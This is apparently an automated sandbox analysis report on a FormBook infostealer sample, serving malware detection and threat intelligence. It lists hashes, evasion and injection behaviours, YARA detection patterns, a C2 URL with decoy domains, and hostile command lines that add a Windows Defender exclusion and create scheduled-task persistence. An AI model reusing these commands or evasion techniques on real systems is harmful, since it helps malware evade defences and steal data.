Edit tour

Windows Analysis Report
22#U0415.exe

Overview

General Information

Sample name:	22#U0415.exe renamed because original name is a hash value
Original sample name:	__.exe
Analysis ID:	1353855
MD5:	e870acd8e63f0bb015c54447dcc8202a
SHA1:	c9580bad08f952929aad6948ec99fe21727c5943
SHA256:	3d563bbc7b98dd20de29d4564c65eeed992f79b5f745078417063138ada4f6ba
Tags:	exe
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Modifies the prolog of user mode functions (user mode inline hooks)

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect virtualization through RDTSC time measurements

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

22#U0415.exe (PID: 6372 cmdline: C:\Users\user\Desktop\22#U0415.exe MD5: E870ACD8E63F0BB015C54447DCC8202A)

powershell.exe (PID: 5020 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tsnokiirph.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 2288 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 6992 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp7F5F.tmp MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 3848 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

systray.exe (PID: 3264 cmdline: C:\Windows\SysWOW64\systray.exe MD5: 28D565BB24D30E5E3DE8AFF6900AF098)

cmd.exe (PID: 6940 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

colorcpl.exe (PID: 7080 cmdline: C:\Windows\SysWOW64\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)

tsnokiirph.exe (PID: 7108 cmdline: C:\Users\user\AppData\Roaming\tsnokiirph.exe MD5: E870ACD8E63F0BB015C54447DCC8202A)

schtasks.exe (PID: 4296 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tsnokiirph" /XML "C:\Users\user\AppData\Local\Temp\tmp8942.tmp MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RegSvcs.exe (PID: 6012 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

RegSvcs.exe (PID: 7056 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/ https://asec.ahnlab.com/en/32149/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.venitro.com/gy14/"], "decoy": ["mavbam.com", "theanhedonia.com", "budgetnurseries.com", "buflitr.com", "alqamarhotel.com", "2660348.top", "123bu6.shop", "v72999.com", "yzyz841.xyz", "247fracing.com", "naples.beauty", "twinklethrive.com", "loscaseros.com", "creditspisatylegko.site", "sgyy3ej2dgwesb5.com", "ufocafe.net", "techn9nehollywoodundead.com", "truedatalab.com", "alterdpxlmarketing.com", "harborspringsfire.com", "soulheroes.online", "tryscriptify.com", "collline.com", "tulisanemas.com", "thelectricandsolar.com", "jokergiftcard.buzz", "sciencemediainstitute.com", "loading-231412.info", "ampsportss.com", "dianetion.com", "169cc.xyz", "zezfhys.com", "smnyg.com", "elenorbet327.com", "whatsapp1.autos", "0854n5.shop", "jxscols.top", "camelpmkrf.com", "myxtremecleanshq.services", "beautyloungebydede.online", "artbydianayorktownva.com", "functional-yarns.com", "accepted6.com", "ug19bklo.com", "roelofsen.online", "batuoe.com", "amiciperlacoda.com", "883831.com", "qieqyt.xyz", "vendorato.online", "6733633.com", "stadtliche-arbeit.info", "survivordental.com", "mrbmed.com", "elbt-ag.com", "mtdiyx.xyz", "mediayoki.site", "zom11.com", "biosif.com", "aicashu.com", "inovarevending.com", "8x101n.xyz", "ioherstrulybeauty.com", "mosaica.online"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.2869863724.0000000002E70000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.1704765237.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000F.00000002.1717172905.0000000000540000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.2870656391.0000000004AF0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6db1:$a1: 3C 30 50 4F 53 54 74 09 40 0x351d1:$a1: 3C 30 50 4F 53 54 74 09 40 0x625f1:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d710:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x78f50:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb51f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x3993f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x66d5f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16407:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x44827:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x71c47:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa468:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa6d2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38888:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x38af2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65ca8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65f12:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x16205:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x44625:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x71a45:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15cf1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x44111:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x71531:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16307:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x44727:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x71b47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1647f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x4489f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x71cbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xb0ea:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x3950a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x6692a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000000.00000002.1671381278.00000000045B2000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x19399:$sqlite3step: 68 34 1C 7B E1 0x194ac:$sqlite3step: 68 34 1C 7B E1 0x477b9:$sqlite3step: 68 34 1C 7B E1 0x478cc:$sqlite3step: 68 34 1C 7B E1 0x74bd9:$sqlite3step: 68 34 1C 7B E1 0x74cec:$sqlite3step: 68 34 1C 7B E1 0x193c8:$sqlite3text: 68 38 2A 90 C5 0x194ed:$sqlite3text: 68 38 2A 90 C5 0x477e8:$sqlite3text: 68 38 2A 90 C5 0x4790d:$sqlite3text: 68 38 2A 90 C5 0x74c08:$sqlite3text: 68 38 2A 90 C5 0x74d2d:$sqlite3text: 68 38 2A 90 C5 0x193db:$sqlite3blob: 68 53 D8 7F 8C 0x19503:$sqlite3blob: 68 53 D8 7F 8C 0x477fb:$sqlite3blob: 68 53 D8 7F 8C 0x47923:$sqlite3blob: 68 53 D8 7F 8C 0x74c1b:$sqlite3blob: 68 53 D8 7F 8C 0x74d43:$sqlite3blob: 68 53 D8 7F 8C
0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6251:$a1: 3C 30 50 4F 53 54 74 09 40 0x1cbb0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa9bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x158a7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b917:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c91a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000C.00000002.2870381691.00000000049A0000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18839:$sqlite3step: 68 34 1C 7B E1 0x1894c:$sqlite3step: 68 34 1C 7B E1 0x18868:$sqlite3text: 68 38 2A 90 C5 0x1898d:$sqlite3text: 68 38 2A 90 C5 0x1887b:$sqlite3blob: 68 53 D8 7F 8C 0x189a3:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6a09:$a1: 3C 30 50 4F 53 54 74 09 40 0x34e29:$a1: 3C 30 50 4F 53 54 74 09 40 0x62249:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d368:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x4b788:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x78ba8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xb177:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x39597:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x669b7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x1605f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x4447f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x7189f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0xa0c0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0xa32a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x384e0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x3874a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65900:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x65b6a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x15e5d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x4427d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7169d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15949:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x43d69:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x71189:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15f5f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x4437f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7179f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x160d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x444f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x71917:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xad42:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x39162:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x66582:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
00000008.00000002.1703327981.0000000005093000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18ff1:$sqlite3step: 68 34 1C 7B E1 0x19104:$sqlite3step: 68 34 1C 7B E1 0x47411:$sqlite3step: 68 34 1C 7B E1 0x47524:$sqlite3step: 68 34 1C 7B E1 0x74831:$sqlite3step: 68 34 1C 7B E1 0x74944:$sqlite3step: 68 34 1C 7B E1 0x19020:$sqlite3text: 68 38 2A 90 C5 0x19145:$sqlite3text: 68 38 2A 90 C5 0x47440:$sqlite3text: 68 38 2A 90 C5 0x47565:$sqlite3text: 68 38 2A 90 C5 0x74860:$sqlite3text: 68 38 2A 90 C5 0x74985:$sqlite3text: 68 38 2A 90 C5 0x19033:$sqlite3blob: 68 53 D8 7F 8C 0x1915b:$sqlite3blob: 68 53 D8 7F 8C 0x47453:$sqlite3blob: 68 53 D8 7F 8C 0x4757b:$sqlite3blob: 68 53 D8 7F 8C 0x74873:$sqlite3blob: 68 53 D8 7F 8C 0x7499b:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: 22#U0415.exe PID: 6372	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x47e6e:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: RegSvcs.exe PID: 3848	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x3addd:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: tsnokiirph.exe PID: 7108	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: tsnokiirph.exe PID: 7108	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x4732e:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: systray.exe PID: 3264	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x364f2:$a1: 3C 30 50 4F 53 54 74 09 40 0x3e211:$a1: 3C 30 50 4F 53 54 74 09 40 0x11a841:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: colorcpl.exe PID: 7080	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x9f99c:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
6.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
